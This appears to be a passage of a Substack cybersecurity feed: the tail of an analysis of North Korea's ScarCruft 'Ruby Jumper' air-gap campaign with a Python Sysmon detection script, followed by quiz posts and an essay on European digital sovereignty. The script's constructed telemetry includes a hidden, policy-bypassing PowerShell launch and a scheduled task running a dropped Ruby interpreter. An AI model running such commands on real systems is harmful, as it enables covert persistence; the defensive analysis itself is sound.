An endpoint detection tool that flags unknown executables but ignores what appears to be a legitimately installed Ruby environment and its associated .rb files might miss the next stage entirely. The flip side is that a Ruby interpreter appearing on a workstation that never had one, and a scheduled task that launches it, are anomalies worth alerting on in most estates.</p><p>SNAKEDROPPER also establishes persistence via a scheduled task, ensuring the malware survives reboots, and drops the two critical air-gap bridging components: THUMBSBD and VIRUSTASK.</p><p><strong>Stage Three: THUMBSBD, the Bridge</strong></p><p>THUMBSBD is the operational centrepiece of the Ruby Jumper campaign. It is disguised as a Ruby file, monitors for the insertion of removable media (USB drives, external hard disks), and uses them to create a physical relay between the infected internet-connected machine and any air-gapped system the same drive is subsequently plugged into.</p><p>When removable media is detected, THUMBSBD creates a hidden folder on the drive and uses it in two directions: it stages operator-issued commands for execution on air-gapped machines, and it stores the output from those commands for exfiltration when the drive is later reconnected to an internet-connected host. That hidden staging folder is the detection opportunity on both sides of the gap: newly created hidden directories on removable volumes, written by a process that is not the user&#8217;s file manager, can be flagged on the connected host and on the isolated one.</p><p>The full capability set of THUMBSBD includes: harvesting system information, downloading secondary payloads from remote servers, exfiltrating files, and executing arbitrary commands. It is also responsible for delivering two further implants: FOOTWINE (the surveillance payload) and the resurrected BLUELIGHT backdoor.</p><p><strong>Stage Four: VIRUSTASK, the Spreader</strong></p><p>VIRUSTASK performs a complementary but distinct function to THUMBSBD. Where THUMBSBD handles command execution and data exfiltration, VIRUSTASK focuses exclusively on propagation; it weaponises removable media to achieve initial access on air-gapped systems that have not yet been infected.</p><p>The architectural separation is significant. 
By dividing propagation from operational command-and-control into two distinct implants, ScarCruft reduces the risk of a single detection event compromising the entire operation. If VIRUSTASK is detected and removed from a USB drive before it reaches an air-gapped target, the existing THUMBSBD infrastructure on internet-connected machines remains intact.</p><p><strong>Stage Five: FOOTWINE, the Surveillance Payload</strong></p><p>FOOTWINE is the implant that does the actual spying. Delivered by THUMBSBD as an encrypted payload with an integrated shellcode launcher, it provides the operator with comprehensive surveillance capabilities: keylogging, audio capture, and video capture.</p><p>Unlike the cloud-based C2 used by other components in the chain, FOOTWINE communicates with its own C2 server via a custom binary protocol over TCP, a choice that prioritises reliability and control over the traffic-blending benefits of abusing cloud storage.</p><p>The command set supported by FOOTWINE is extensive and worth documenting in full, as it illustrates the breadth of access an operator achieves once FOOTWINE is running on a target:</p><ul><li><p><strong>sm: </strong>Interactive command shell execution</p></li><li><p><strong>fm: </strong>File and directory manipulation</p></li><li><p><strong>gm: </strong>Plugin and configuration management</p></li><li><p><strong>rm: </strong>Windows Registry modification</p></li><li><p><strong>pm: </strong>Running process enumeration</p></li><li><p><strong>dm: </strong>Screenshot capture and keystroke logging</p></li><li><p><strong>cm: </strong>Audio and video surveillance</p></li><li><p><strong>s_d: </strong>Batch script execution (saves to %TEMP% and runs)</p></li><li><p><strong>pxm: </strong>Proxy connection setup and bidirectional traffic relay</p></li><li><p><strong>[filepath]: </strong>Arbitrary DLL loading via filepath</p></li></ul><p>The proxy relay capability (pxm) is particularly notable, as it allows the operator to route traffic 
through the infected machine, potentially using it as a pivot point into the wider network.</p><p><strong>Stage Six: BLUELIGHT Returns</strong></p><p>Rounding out the toolset is BLUELIGHT, a ScarCruft backdoor that has been in active use since at least 2021. Its continued deployment in Ruby Jumper demonstrates that ScarCruft recycles proven tooling rather than retiring it, updating supporting infrastructure while keeping reliable implants in rotation.</p><p>BLUELIGHT uses legitimate cloud providers (Google Drive, Microsoft OneDrive, pCloud, and BackBlaze) for C2, and supports running arbitrary commands, enumerating file systems, downloading payloads, uploading files, and self-deleting on command. Like the rest of the chain, its use of trusted cloud services is specifically designed to make network-layer detection impractical.</p><h2><strong>Why This Campaign Matters</strong></h2><p><strong>The Cloud C2 Problem Has No Easy Fix</strong></p><p>The most uncomfortable aspect of Ruby Jumper is that its central evasion strategy, routing C2 traffic through legitimate cloud services, is genuinely difficult to defend against at scale.</p><p>Organisations cannot simply block Zoho WorkDrive, Google Drive, OneDrive, pCloud, and BackBlaze. These are services that employees use legitimately every day. Any block would be disruptive and is likely to result in workarounds (personal hotspots, personal devices) that create worse security outcomes than the threat they were trying to address.</p><p>The more realistic defensive approaches are behavioural. One is to look for unusual processes making HTTPS connections to cloud storage endpoints, particularly processes spawned from PowerShell or processes that inject into others. The other is endpoint telemetry rich enough to correlate file-level and process activity with network activity, because the traffic itself is ordinary TLS to a legitimate domain and says little on its own. 
Neither is easy nor cheap, and both require mature security tooling that many organisations simply do not have.</p><p><strong>Air-Gap Bridging Via USB Is Not New, But It Is Getting More Sophisticated</strong></p><p>The USB-based air-gap bridging technique used by THUMBSBD and VIRUSTASK is not novel. Stuxnet, the most famous air-gap attack in history, used a similar approach. Russian APT groups have deployed similar tooling against Ukrainian industrial systems. What is notable about Ruby Jumper is the division of labour between two dedicated implants for this purpose, and the integration of the USB channel into a broader modular framework that includes cloud C2, surveillance, and persistence.</p><p>The implication for organisations that rely on air gaps as a security control is sobering: the air gap only holds if physical access to the isolated network is strictly controlled, and if every device that crosses the boundary (USB drives, laptops taken to meetings, maintenance equipment) is treated as potentially hostile. That level of operational security is extremely difficult to maintain in practice.</p><p><strong>The Ruby Runtime Trick Is Worth Watching</strong></p><p>Installing a full programming language runtime as part of a malware deployment is unusual enough to warrant attention. The technique works because security tooling tends to focus on known malicious executables and suspicious unsigned binaries, not on Ruby interpreter processes running .rb files that were installed by a scheduled task three weeks ago.</p><p>If this method proves effective, and Ruby Jumper suggests it does, other threat actors are likely to adopt similar variations. 
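</p><p>As an added illustration of the two detection ideas raised above (correlating which process talks to a cloud storage service and what spawned it, and hunting for interpreter runtimes that arrive via scheduled tasks in odd locations), here is example code written for this page. It is not from the Zscaler report and is not ScarCruft&#8217;s tooling. It walks Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records. The sample events, the cloud-storage domain list, the allowlist of user-facing applications, and the &#8220;uncommon directory&#8221; heuristic are all constructed assumptions that a team would tune to its own estate.</p>

```python
"""Added example (not from the Zscaler report, not ScarCruft code): join Sysmon-style
EID 1 (process create) and EID 3 (network connect) records to surface the Ruby Jumper
behaviours described on this page. All lists, paths and events are constructed."""
import ntpath
import re
from dataclasses import dataclass

# Assumed starting points: services the article names and apps expected to reach them.
CLOUD_STORAGE_DOMAINS = ("workdrive.zoho.com", "drive.google.com",
                         "onedrive.live.com", "pcloud.com", "backblazeb2.com")
USER_FACING_APPS = {"chrome.exe", "msedge.exe", "firefox.exe",
                    "onedrive.exe", "outlook.exe", "teams.exe"}
INTERPRETERS = {"ruby.exe", "rubyw.exe", "python.exe", "pythonw.exe", "node.exe", "lua.exe"}
SCRIPT_EXT = (".rb", ".py", ".js", ".lua")
# Assumption: a legitimately installed interpreter does not normally live here.
UNCOMMON_DIR = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
# schtasks /tr "<action>" or /tr <action>
TASK_ACTION = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.I)


@dataclass
class Finding:
    rule: str
    pid: int
    severity: str
    detail: str


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def is_cloud_storage(host: str) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in CLOUD_STORAGE_DOMAINS)


def ancestors(pid: int, procs: dict, limit: int = 8) -> list:
    """Image names from pid upward, following ParentProcessId in the EID 1 records."""
    chain = []
    while pid in procs and len(chain) < limit:
        chain.append(basename(procs[pid]["image"]))
        pid = procs[pid]["ppid"]
    return chain


def detect(events: list) -> list:
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    findings = []
    for e in events:
        if e["id"] == 1:
            img = basename(e["image"])
            # Interpreter binary or its script living under a user-writable drop location.
            if img in INTERPRETERS and UNCOMMON_DIR.search(e["image"] + " " + e["cmd"]):
                findings.append(Finding("interpreter_in_uncommon_dir", e["pid"], "medium", e["cmd"]))
            # Persistence: a scheduled task whose action is an interpreter or a script.
            if img == "schtasks.exe" and "/create" in e["cmd"].lower():
                m = TASK_ACTION.search(e["cmd"])
                action = ((m.group(1) or m.group(2)) if m else "").lower()
                if any(i in action for i in INTERPRETERS) or action.endswith(SCRIPT_EXT):
                    findings.append(Finding("scheduled_task_runs_interpreter", e["pid"], "high", action))
        elif e["id"] == 3 and e["port"] == 443 and is_cloud_storage(e["dst"]):
            img = basename(e["image"])
            if img not in USER_FACING_APPS:
                # The join: the same pid's EID 1 lineage tells us who spawned the talker.
                chain = ancestors(e["pid"], procs)
                sev = "high" if "powershell.exe" in chain[1:] else "medium"
                findings.append(Finding("cloud_storage_from_unexpected_process", e["pid"], sev,
                                        f"{img} -> {e['dst']} (chain: {' <- '.join(chain)})"))
    return findings


# Constructed telemetry, not real logs: explorer -> powershell -> notepad beaconing to
# Zoho WorkDrive, a benign browser session, a Ruby runtime dropped under AppData and
# registered as a task, and a developer's ordinary Ruby install for contrast.
U = r"C:\Users\alice\AppData\Roaming\rb"
SAMPLE_EVENTS = [
    {"id": 1, "pid": 4212, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"id": 1, "pid": 5120, "ppid": 4212, "cmd": "powershell.exe -w hidden -nop -ep bypass",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"id": 1, "pid": 5300, "ppid": 5120, "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    {"id": 3, "pid": 5300, "image": r"C:\Windows\System32\notepad.exe", "dst": "workdrive.zoho.com", "port": 443},
    {"id": 3, "pid": 6000, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst": "drive.google.com", "port": 443},
    {"id": 1, "pid": 5400, "ppid": 5120, "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": f'schtasks.exe /create /sc onlogon /tn Updater /tr "{U}\\bin\\ruby.exe {U}\\svc.rb"'},
    {"id": 1, "pid": 7100, "ppid": 900, "image": U + r"\bin\ruby.exe", "cmd": f"ruby.exe {U}\\svc.rb"},
    {"id": 1, "pid": 7200, "ppid": 4212, "image": r"C:\Ruby33-x64\bin\ruby.exe", "cmd": r"ruby.exe C:\dev\app\app.rb"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule} pid={f.pid}: {f.detail}")
```

<p>Run stand-alone it reports three findings from the constructed telemetry: notepad.exe reaching workdrive.zoho.com with powershell.exe in its parent chain (high), a schtasks /create whose action runs ruby.exe out of AppData (high), and the Ruby interpreter itself executing from AppData (medium). The Chrome session to Google Drive and the developer&#8217;s Ruby under C:\Ruby33-x64 produce nothing. The point is the join: the network event on its own is indistinguishable from ordinary traffic, and it is the process lineage from the EID 1 records that makes it actionable.</p><p>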
Expect to see more campaigns that bootstrap legitimate interpreter environments (Python, Lua, Node.js) to deploy malicious code in a form that blends into developer machines and legitimate software environments.</p><h2><strong>Detection and Defensive Recommendations</strong></h2><p>The following indicators and defensive measures are derived from the Zscaler ThreatLabz analysis of Ruby Jumper.</p><p><strong>What to Look For</strong></p><ul><li><p>LNK files arriving via email or downloaded from external sources that spawn PowerShell processes, particularly those that scan their own directory and carve payloads from fixed file offsets</p></li><li><p>Unexpected installation of Ruby runtime environments, especially via scheduled tasks or batch scripts</p></li><li><p>Processes making HTTPS connections to Zoho WorkDrive, Google Drive, OneDrive, pCloud, or BackBlaze that were not spawned by a known user-facing application</p></li><li><p>Hidden directories created on removable media, particularly those containing .bat or .ps1 files</p></li><li><p>Scheduled tasks pointing to Ruby .rb files in uncommon directories</p></li><li><p>Outbound TCP connections using custom binary protocols from processes that should not be making direct network connections</p></li></ul><p><strong>Defensive Measures</strong></p><ul><li><p>Enable application whitelisting to prevent unauthorised Ruby (or other interpreter) runtime installations</p></li><li><p>Implement USB device control policies that prevent automatic execution from removable media and log all USB insertion events</p></li><li><p>Deploy endpoint detection capable of correlating process behaviour with network activity, not just file-level signatures</p></li><li><p>For truly sensitive environments, enforce strict removable media controls: all USB drives that cross the air-gap boundary should be scanned on an isolated inspection machine before use</p></li><li><p>Monitor for anomalous HTTPS traffic to cloud storage endpoints from 
non-standard processes, even within otherwise trusted domains</p></li><li><p>Review scheduled tasks regularly. Legitimate software rarely installs scheduled tasks that invoke script interpreters without user knowledge</p></li></ul><h2><strong>Conclusion</strong></h2><p>Ruby Jumper is a mature, well-engineered espionage campaign from one of North Korea&#8217;s most experienced threat actors. It does not rely on any single novel technique. LNK droppers, cloud C2 abuse, USB bridging, and custom surveillance implants are all established approaches. What makes it significant is the sophistication with which those techniques are combined into a coherent, modular, and resilient framework.</p><p>The campaign&#8217;s use of Zoho WorkDrive marks a deliberate expansion of ScarCruft&#8217;s cloud infrastructure abuse, and the purpose-built separation of THUMBSBD and VIRUSTASK into dedicated exfiltration and propagation components shows a level of operational discipline that should concern defenders protecting sensitive networks.</p><p>The air gap is not broken. 
But Ruby Jumper is a reminder that an air gap is only as strong as the operational security practices surrounding it, and that North Korean intelligence services are investing significant resources in finding gaps in those practices.</p><div><hr></div><h2><strong>Sources</strong></h2><p><strong>1. </strong><a href="https://www.zscaler.com/blogs/security-research/apt37-adds-new-capabilities-air-gapped-networks">APT37 Adds New Capabilities for Air-Gapped Networks &#8212; Zscaler ThreatLabz</a><em>  </em></p><p><strong>2. 
</strong><a href="https://thehackernews.com/2026/02/scarcruft-uses-zoho-workdrive-and-usb.html">ScarCruft Uses Zoho WorkDrive and USB Malware to Breach Air-Gapped Networks &#8212; The Hacker News</a><em>  </em></p><p><strong>3. </strong><a href="https://thehackernews.com/2024/01/north-korean-hackers-weaponize-fake.html">North Korean Hackers Weaponize Fake Research to Deliver RokRAT Backdoor &#8212; The Hacker News</a><em>  </em></p><p><strong>4. </strong><a href="https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html">North Korea Hackers Using New DOLPHIN Backdoor to Spy on South Korean Targets &#8212; The Hacker News</a><em>  </em></p><p><strong>5. </strong><a href="https://thehackernews.com/2021/08/nk-hackers-deploy-browser-exploit-on.html">NK Hackers Deploy Browser Exploit on Watering Hole Sites to Install BLUELIGHT Malware &#8212; The Hacker News</a><em>  </em></p>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-f98</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-f98</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Sun, 01 Mar 2026 14:02:06 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/46e46abb-1b1f-4b06-a636-84db5a9a0cb2_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453838}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s Answer: SQL parameterization</p><ul><li><p>SQL parameterization is a technique used to prevent SQL injection attacks, not DDoS attacks.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-4df</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-4df</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Sat, 28 Feb 2026 14:01:10 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/71867934-e4e2-4a58-a4c5-8f4884edd4a5_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453833}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s Answer: Forwarding</p><ul><li><p>The port is fully operational, sending and receiving all data frames</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-ed6</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-ed6</guid><dc:creator><![CDATA[Emiliano L. 
Compassi]]></dc:creator><pubDate>Fri, 27 Feb 2026 14:02:44 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/882c6f3e-6397-4045-9cbe-6de70288c5d7_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453830}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s Answer: Impersonating identity</p><ul><li><p>Spoofing is a type of cyber attack where a person or program acts as another to gain an illicit advantage or access.</p></li></ul>]]></content:encoded></item><item><title><![CDATA[Europe Is Waking Up to Its Digital Dependency, and It's Uncomfortable]]></title><description><![CDATA[Washington's unpredictability is doing what years of EU policy couldn't: forcing Europe off American infrastructure]]></description><link>https://emilianocybersec.substack.com/p/europe-is-waking-up-to-its-digital</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/europe-is-waking-up-to-its-digital</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Thu, 26 Feb 2026 17:27:13 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/bae53cc8-d0fc-42ff-a91e-e46e0c57fce4_6888x3432.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The data tells a story Europeans would rather not confront. American hyperscalers (Amazon Web Services, Microsoft Azure, and Google Cloud) control roughly 70% of the European cloud market (IaaS and PaaS combined, 2025 estimates). 
European firms, by contrast, hold just 15% of their own market, down from 29% in 2017. On every layer of the digital stack (hardware, software, cloud, AI, social platforms), Europe is a tenant in someone else&#8217;s building.</p><div class="captioned-image-container"><figure><img src="https://substackcdn.com/image/fetch/$s_!UWMg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe7b812b6-57d7-4a84-bba1-feb9319ad2f8_1434x1034.png" width="1434" height="1034" alt=""></figure></div><p>That fact was tolerable when Washington was a reliable landlord. 
It is significantly less tolerable now.</p><div><hr></div><h2>The Trigger: Trump 2.0 and the Weaponisation of Tech</h2><p>Donald Trump&#8217;s return to the White House in January 2025 did more to accelerate Europe&#8217;s push for digital sovereignty than a decade of <a href="https://gdpr-info.eu/">GDPR</a> enforcement ever managed. Within weeks, the administration issued a memorandum framing EU digital regulations (the <a href="https://digital-strategy.ec.europa.eu/en/policies/digital-services-act-package">Digital Services Act</a>, the <a href="https://digital-markets-act.ec.europa.eu/index_en">Digital Markets Act</a>, and digital services taxes) not as legitimate regulatory activity but as &#8220;extortion&#8221; targeting American companies. By August, Trump was posting direct threats on Truth Social: &#8220;I will stand up to Countries that attack our incredible American Tech Companies.&#8221;</p><p>The message was unambiguous. Europe&#8217;s right to regulate its own digital market was, in Washington&#8217;s view, negotiable. That realisation landed differently than any abstract argument about sovereignty could.</p><p>&#8220;Trump&#8217;s threats have spurred a European awakening,&#8221; researchers from France 24 noted in early 2026, though they were careful to add that similar urgency followed the <a href="https://www.theguardian.com/world/2013/jun/06/nsa-phone-records-verizon-court-order">Snowden revelations</a> in 2013 and dissipated quickly. The question now is whether this time the political will survives the news cycle.</p><div><hr></div><h2>The Legal Architecture of Dependency</h2><p>The sovereignty problem is not merely political. It is structural and legal. The <a href="https://www.justice.gov/file/1480346/dl">2018 US CLOUD Act</a> allows American law enforcement to compel US-based technology companies to hand over user data regardless of where that data is physically stored. 
A government ministry in Berlin running its operations on Microsoft Azure is, under American law, potentially subject to American jurisdiction. European data protection rules offer no guaranteed shield.</p><p>This is the core tension European governments are grappling with: they can pass the world&#8217;s most rigorous data privacy legislation (and Europe has) while remaining entirely dependent on infrastructure governed by a foreign legal system with extraterritorial reach.</p><p>Estonia has been among the most direct in naming this vulnerability. &#8220;While we value our technological partnerships, relying solely on closed, proprietary &#8216;black box&#8217; solutions creates a strategic vulnerability,&#8221; Liisa Pakosta, the country&#8217;s minister of justice and digital affairs, told CNBC in February 2026. For Estonia (which shares a border with Russia and has faced sustained Russian cyberattacks), digital sovereignty is not a trade policy talking point. It is, as Pakosta put it, &#8220;a matter of national survival, not just IT policy.&#8221;</p><div><hr></div><h2>The EuroStack and the Gaia-X Cautionary Tale</h2><p>The flagship concept driving Europe&#8217;s response is the &#8220;<a href="https://www.ceps.eu/ceps-publications/eurostack-a-european-alternative-for-digital-sovereignty/">EuroStack</a>&#8220;: a framework that maps digital technologies into interconnected layers, from semiconductors and cloud infrastructure up through AI and software services, and charts where European alternatives need to be built. The concept was formally articulated by a group of competition economists and policy researchers in early 2025, drawing lessons from a notable prior failure: <a href="https://gaia-x.eu/">Gaia-X</a>.</p><p>Launched in 2020 as an ambitious Franco-German project to build a federated European cloud ecosystem, Gaia-X became a case study in how easily sovereignty projects are captured. 
American companies (Microsoft, Google, AWS) lobbied their way into the initiative&#8217;s governance structures, framing participation as partnership rather than conflict.</p><p>The structural result was predictable. &#8220;Once they were inside Gaia-X, the initiative lost its purpose,&#8221; argued competition expert Cristina Caffarra, one of the driving forces behind the EuroStack initiative. What remained was a body producing standards documents and certification labels, not a transformed commercial landscape. Standards, it turned out, are not the same as sovereignty.</p><p>The lesson the EuroStack proponents draw is sharp: you cannot outsource independence to the entities you are trying to become independent from. What critics now call &#8220;sovereignty-washing&#8221; (American hyperscalers marketing European-branded versions of their services as genuinely sovereign solutions) is the same dynamic in updated form.</p><p>AWS, Google, and Microsoft have all launched EU-specific cloud units in response to growing European anxiety about data residency. Whether legal structures created under American corporate umbrellas provide genuine sovereignty from the CLOUD Act remains legally untested and politically contested.</p><div><hr></div><h2>The Numbers: How Much Would Independence Actually Cost?</h2><p>The <a href="https://cepa.org/article/digital-sovereignty-can-europe-afford-it/">Center for European Policy Analysis (CEPA)</a> ran the calculation in late 2025 and the figure was sobering: full technological independence from American systems would cost an estimated 3.6 trillion euros. 
The European Commission&#8217;s own digital sovereignty agenda (more narrowly scoped) remains one of the bloc&#8217;s most significant policy priorities.</p><p><a href="https://www.gartner.com/en/newsroom/press-releases/2026-02-09-gartner-says-worldwide-sovereign-cloud-iaas-spending-will-total-us-dollars-80-billion-in-2026">Gartner</a> predicted that sovereign cloud spending in Europe would more than triple by 2027, reaching $23 billion. Governments will remain the primary buyers, followed by regulated industries and critical infrastructure operators in energy, utilities, and telecommunications.</p><p>CEPA&#8217;s analysis argued that complete independence is the wrong goal. Resilient strategic partnerships, redundancy through diversification, and selective capability-building in critical areas (semiconductors, cloud, AI, space) are a more realistic and cost-effective path than attempting to replicate Silicon Valley from scratch. Others, particularly those aligned with the EuroStack initiative, push back on this framing, arguing that &#8220;just enough&#8221; independence in key areas is precisely the point: not autarky, but enough leverage that a foreign power cannot unilaterally switch off European digital infrastructure.</p><div><hr></div><h2>On the Ground: Citizens and the De-Googling Movement</h2><p>The debate is not confined to Brussels policy papers. In Germany, the <a href="https://www.ccc.de/en/">Chaos Computer Club</a> has been running monthly &#8220;de-Googling&#8221; sessions: community meetings across the country on the first Sunday of each month, designed to walk people through practical alternatives to American services. LibreOffice over Microsoft Word. Mastodon over X. Signal over WhatsApp.</p><p>&#8220;We want to offer concrete, free and gradual help to get rid of American services,&#8221; said Jochim Selzer, one of the club&#8217;s spokespersons on digital self-defence. 
&#8220;The idea is to turn a process that can seem tedious and technical into something rather fun and collaborative.&#8221;</p><p>Research data from Similarweb indicates that interest in European digital services (email, messaging, search engines) has grown measurably since early 2025, correlating with Trump&#8217;s return and the subsequent political friction. Whether that interest translates into lasting behavioural change is less certain. Privacy-focused European alternatives exist across most categories: messaging, webmail, search, and office software. <a href="https://proton.me/">Proton</a>, the Swiss-based encrypted email and VPN provider, is among the more widely adopted examples. Their challenge as a class isn't about technical quality. Instead, it's about network effects and marketing budgets that have grown over many decades.</p><p>&#8220;It&#8217;s no fun being on the most perfect social network if nobody else is there,&#8221; one digital sovereignty researcher noted. Critical mass matters, and Big Tech spent decades building it.</p><div><hr></div><h2>What Europe Actually Controls: Regulation</h2><p>Where Europe has genuine leverage is in its regulatory framework. The <a href="https://digital-markets-act.ec.europa.eu/index_en">Digital Markets Act</a>, the <a href="https://digital-strategy.ec.europa.eu/en/policies/digital-services-act-package">Digital Services Act</a>, and the <a href="https://gdpr-info.eu/">GDPR</a> collectively represent the world&#8217;s most consequential digital regulation regime. In April 2025, the European Commission fined both Apple and Meta under the DMA. 
The EU&#8217;s proposed <a href="https://commission.europa.eu/strategy-and-policy/priorities-2024-2029/europe-digital-age/democracy-shield_en">Democracy Shield</a> aims to systematise defences against foreign disinformation operations.</p><p>The EU also declared 2025 the <a href="https://digital-decade.ec.europa.eu/">European Year of Digital Citizenship Education</a>, a gesture toward the longer-term project of building public understanding and demand for alternatives.</p><p>But critics argue that European competition policy over the past two decades, by preventing the formation of European technology champions while American firms achieved monopolistic scale, produced the dependency it is now trying to regulate its way out of. As one analysis put it bluntly, Europeans were lectured that industrial policy violated market principles by the very Americans who practised it systematically. (<a href="https://www.noemamag.com/reclaiming-europes-digital-sovereignty/">Noema Magazine</a>)</p><div><hr></div><h2>The Realistic Assessment</h2><p>Europe&#8217;s position in 2026 is paradoxical. It is a global regulatory standard-setter (<a href="https://gdpr-info.eu/">GDPR</a> and the <a href="https://artificialintelligenceact.eu/">AI Act</a> have influenced legislation across dozens of jurisdictions), but it owns roughly 4% of global cloud infrastructure. It sets the rules of the game in its own market while playing on an opponent&#8217;s pitch.</p><p>Complete de-Americanization of European tech is not happening anytime soon. Forrester predicted in late 2025 that no European enterprise would shift entirely from US hyperscalers in 2026. The dependencies are too deep, the switching costs too high, and the European alternatives in AI and frontier cloud infrastructure too nascent.</p><p>What is shifting is the political calculus. 
For the first time, broad coalitions (from Baltic security ministries to German civil society groups to French competition economists) are converging on the view that the status quo is a strategic risk, not just an inconvenience. Whether that convergence produces the sustained institutional investment required to change it, or dissipates as the post-Snowden moment did in 2013, is the open question that will define Europe&#8217;s digital future.</p><p>The strongest argument against urgency is the one that has prevailed for thirty years: hyperscaler dependency has worked. American cloud infrastructure is reliable, cheap, and technically superior to anything Europe currently offers at scale. Why disrupt an arrangement that functions?</p><p>The answer is that it functions under specific conditions. The <a href="https://www.justice.gov/file/1480346/dl">CLOUD Act</a> means European data on American servers is subject to American law, regardless of GDPR. Trump&#8217;s explicit threats to restrict digital services to countries with &#8220;discriminatory&#8221; tech regulations showed that access can be politicised. And in war-time or sanctions scenarios (ask any Ukrainian institution how much they want their critical systems on infrastructure a foreign government can switch off) the fragility becomes existential. Europe is trying to regulate the digital world while renting the servers it runs on. That arrangement survived a friendly landlord. It may not survive a hostile one.</p>
<div><hr></div><h2>Sources</h2><ul><li><p><a href="https://www.atlanticcouncil.org/in-depth-research-reports/report/digital-sovereignty-europes-declaration-of-independence/">Digital sovereignty: Europe&#8217;s declaration of independence? &#8212; Atlantic Council</a></p></li><li><p><a href="https://www.theregister.com/2025/12/22/europe_gets_serious_about_cutting/">Europe gets serious about cutting digital umbilical cord with Uncle Sam&#8217;s big tech &#8212; The Register</a></p></li><li><p><a href="https://ecfr.eu/publication/get-over-your-x-a-european-plan-to-escape-american-technology/">Get over your X: A European plan to escape American technology &#8212; ECFR</a></p></li><li><p><a href="https://www.france24.com/en/technology/20260204-digital-sovereignty-european-citizens-trapped-into-using-us-big-tech">Digital sovereignty (3/3): Are European citizens trapped into using US Big Tech? &#8212; France 24</a></p></li><li><p><a href="https://cepa.org/article/digital-sovereignty-can-europe-afford-it/">Digital Sovereignty: Can Europe Afford It? 
&#8212; CEPA</a></p></li><li><p><a href="https://carnegieendowment.org/research/2025/06/rethinking-eu-digital-policies-from-tech-sovereignty-to-tech-citizenship?lang=en">Rethinking EU Digital Policies: From Tech Sovereignty to Tech Citizenship &#8212; Carnegie Endowment</a></p></li><li><p><a href="https://www.cnbc.com/2026/02/18/europe-digital-sovereignty-geopolitical-tensions.html">Europe bids for digital sovereignty amid Russia threats, Trump &#8212; CNBC</a></p></li><li><p><a href="https://www.noemamag.com/reclaiming-europes-digital-sovereignty/">Reclaiming Europe&#8217;s Digital Sovereignty &#8212; Noema Magazine</a></p></li></ul>]]></content:encoded></item><item><title><![CDATA[Daily Cyber Quiz]]></title><description><![CDATA[Answer revealed tomorrow...]]></description><link>https://emilianocybersec.substack.com/p/daily-cyber-quiz-cfb</link><guid isPermaLink="false">https://emilianocybersec.substack.com/p/daily-cyber-quiz-cfb</guid><dc:creator><![CDATA[Emiliano L. Compassi]]></dc:creator><pubDate>Thu, 26 Feb 2026 14:02:02 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/f58aa70b-15af-4f4d-ac35-946a71106745_5760x3840.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="poll-embed" data-attrs="{&quot;id&quot;:453829}" data-component-name="PollToDOM"></div><p>Yesterday&#8217;s Answer: IDS (Intrusion Detection System) </p><ul><li><p>An IDS is designed to monitor network traffic for suspicious activity, known attack patterns (signatures), or policy violations. 
